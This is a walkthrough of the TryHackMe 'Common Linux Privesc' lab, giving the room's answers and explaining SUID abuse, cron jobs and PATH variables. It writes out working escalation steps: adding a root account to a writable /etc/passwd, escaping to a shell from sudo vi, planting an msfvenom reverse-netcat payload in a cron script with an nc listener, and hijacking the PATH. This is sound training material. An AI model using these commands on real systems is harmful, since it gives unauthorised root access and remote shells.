Common Linux Privesc Walkthrough
In this part, we will solve Tryhackme-Common Linux Privesc room and explore some details about Linux privilege escalataion.
Task 3
This part says that there are mainly two types of privilege escalation. However, when we talk about the term of escalation, horizontal privilege escalation doesnt make any sense. However, I will explain horizontal and vertical privilege escalation.
Horizontal priv escalation means that the attacker gains other users rights which doesn’t have any higher access rights. For example, user1 is a normal user and user2 is also. User1 hijack user2.
Vertical privilege escalation is our real target. The best scenario in here is to be root or Administrator.
Task 4 : Enumeration
Here, we will use a tool called LinEnum.
The tool is a simple bash script related to privilege escalation.
You can use the link below to download this script.
We can user use “LinEnum.sh” file by 2 ways. The first one is that to publish our .sh file by our python server and get this file to target machine by using wget command. The second and more practical way is copy and paste the raw command to target machine and save this file as .sh extension.
Actually, I prefer the second way but to see the first way, I will use the first way.
Then, I am starting Python web server using “python3 -m http.server 8000” on my machine.
Then, on user3 desktop, I am using the command below:
wget "10.10.9.174:8000/LinEnum.sh"Let’s add execute permission on this . sh file by using chmod:
chmod +x FILENAME.shby using ls -la command, I am sure that the user has execute right:
rwxrwxr-x
Next, we run this script bu “./LinEnum.sh”
We need to understand SUID files to understand Linux Privilege Escalation.
SUID is a special permission that allows other users run with the owner’s privileges. By this way, we can exploit this feature.
By adding number 4 in the permission number we can set a file as SUID files.
For example out file has 777 permission file for our user. 4777 is our suid permission.
sudo chmod 4777 FILE
ls -la
-rwsrwxrwx 1 kali kali ...s letter means this file is set with SUID bir.
My final note for SUID bit is that we can find SUID files in the system by using the command in the following.
find / -perm -u=s -type f 2>/dev/nullFirst, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
- Completed
What is the target’s hostname?
- polobox
Look at the output of /etc/passwd how many “user[x]” are there on the system?
- 8
How many available shells are there on the system?
- 4
we can find the shells by using cat /etc/shells command.
What is the name of the bash script that is set to run every 5 minutes by cron?
- autoscript.sh
By using cat crontab, we reach the following information:
/home/user4/Desktop/autoscript.sh
What critical file has had its permissions changed to allow some users to write to it?
- /etc/passwd
Lets talk about this file. This file consists of the information about accounts on the machine.
To read this file, we need read permission and write permission belongs to only root or super user. This file belongs to root user and the number of permission is 644.
- rw-rw-r — 1 root root
Also, we will be looking for passwords in /etc/shadow file. This file consists of encrypted password hashes. This file is only readable by the superuser only.
Task 5: Abusing SUID/GUID Files
SUID is a permission bit flag that applies to executables. SUID allows an alternate user to run an executable with the same permissions as the owner of the file instead of the permissions of the alternate user.
SUID : rws-wrx-rwx
GUID : rwx-rws-rwx
Finding SUID binaries: We have reached thos SUID capable files thanks to LinEnum.
However, we can find SUID binaries also by using the following command:
find / -perm -u=s -type f 2>/dev/null2>/dev/null is used for suppresses errors and the others is explicit.
What is the path of the file in user3’s directory that stands out to you?
- /home/user3/shell
which means we can run this file like root user.
So, lets look at this file first, and run it.
We reach the information that user7 is a member of root group with gid 0. UID 0 is reserved for user root.
Task 6 : Exploiting Writable /etc/passwd
If we write /etc/passwd file, we can manipulate user accounts.
lets switch to user 7 by using su command and password password.
Having read the information above, what direction privilege escalation is this attack?
- vertical
Lets create a compliant password hash to add and create a new user.
We will do this by using openssl.
openssl passwd -1 -salt "new" "123"and we get the hash below:
What is the hash created by using this command with the salt, “new” and the password “123”?
- $1$new$p7ptkEKU1HnaHpRtzNizS1
Since we can write /etc/passwd file, we can create a new root user.
What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?
- new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root://bin/bash
I am looking for /etc/passwd, then I see the pattern below:
root:x:0:0:root:/root:/bin/bash
Then, I change “root” with “new”
and “x” with “$1$new$p7ptkEKU1HnaHpRtzNizS1”
Great! Now you’ve got everything you need. Just add that entry to the end of the /etc/passwd file!
I add the value above to /etc/passwd file.
Now, use “su” to login as the “new” account, and then enter the password. If you’ve done everything correctly- you should be greeted by a root prompt!
By using “su new” and password “123”, I reach root privilege.
Task 7 : Escaping Vi Editor
First, we should try “sudo -l” command to see what command we can use as a super user.
swap user8 bu using “su user8” and password “password”
And run “sudo -l”. Then I am seeing that user8 may run
“NOPASSWD: /usr/bin/vi”
Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?
- NOPASSWD
So, all we need to do is open vi as root, by typing “sudo vi” into the terminal.
Now, type “:!sh” to open a shell!
Yessss!! I got a shell.
Task 8 : Exploiting Crontab
By “cat /etc/crontab”, we see the values below:
Lets create a payload for crontab using msfvenom.
What is the flag to specify a payload in msfvenom?
- -p
Create a payload using: “msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R -o Payload”
What directory is the “autoscript.sh” under?
- /home/user4/Desktop
Then I get the Payload from my machine to target machine by using wget as previously or copy-paste to autoscript.sh by using echo as below:
echo [Payload] > /home/user4/Desktop/autoscript.shThen I am starting netcat listener on my machine on port 8888 by using the command below:
nc -lvnp 8888Then I am waiting to get a root shell from the victim machine.
Task 9: Exploiting PATH Variable
Tryhackme says that :” PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user.”
It is very simple to view the Path of the relevant user with help of the command “echo $PATH”.
For example, for “new” user,
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
we will rewrite the path variable to a location of our choosing.
Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?
- ls
when we look at the directory list, we see that “script” file is red colored.
After copy this file to /tmp/, I have looked its permissions by using “ls -la”
- rwxr-xr-x 1 user5 user5 8392 May 31 13:36 script
Lets create an imitation executable. I want to use “ls” command for the sake of simplicity.
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating
- echo “/bin/bash” > ls
Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?
- chmod +x ls
